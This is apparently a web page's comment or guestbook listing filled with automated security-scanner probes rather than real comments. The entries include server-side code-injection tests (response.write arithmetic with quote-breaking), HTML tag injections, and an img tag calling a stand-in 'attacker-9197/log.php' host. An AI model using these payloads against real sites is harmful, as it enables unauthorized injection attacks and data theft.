  2021-05-06 07:03:10


  1


 • pHqghUme

  2021-05-06 07:03:10


  '+response.write(9706308*9858853)+'


 • pHqghUme

  2021-05-06 07:03:09


  response.write(9706308*9858853)


 • "+response.write(9103126*9891382)+"

  2021-05-06 07:03:08


  1


 • pHqghUme

  2021-05-06 07:03:07


  1


 • '+response.write(9103126*9891382)+'

  2021-05-06 07:03:05


  1


 • response.write(9103126*9891382)

  2021-05-06 07:03:04


  1


 • pHqghUme

  2021-05-06 07:03:00


  1


 • pHqghUme

  2021-05-06 07:02:58


  1


 • pHqghUme

  2021-05-06 07:02:57


  1


 • pHqghUme

  2021-05-06 07:02:56


  1


 • pHqghUme

  2021-05-06 07:02:55


  1


 • pHqghUme

  2021-05-06 07:02:55


  1


 • pHqghUme

  2021-05-06 07:02:53


  FuFQCRH2


 • pHqghUme

  2021-05-06 07:02:53


  1


 • 383w9bH6

  2021-05-06 07:02:51


  1


 • pHqghUme

  2021-05-06 07:02:49


  1


 • pHqghUme

  2021-05-06 07:02:48


  1


 • pHqghUme

  2021-05-06 06:59:14


  1


 • pHqghUme

  2021-05-06 06:58:46


  1


 • pHqghUme

  2021-05-06 06:58:32


  1agK976AO


 • 1rF9yhbeO

  2021-05-06 06:58:31


  1


 • pHqghUme

  2021-05-06 06:58:29


  1


 • pHqghUme

  2021-05-06 06:58:28


  1


 • pHqghUme

  2021-05-06 06:29:23


  1


 • pHqghUme

  2021-05-06 02:36:19


  1<VvlhiF<


 • pHqghUme

  2021-05-06 02:35:52


  1<img sRc='http://attacker-9197/log.php?


 • pHqghUme

  2021-05-06 02:35:08


  1<tFzwaO x=9041>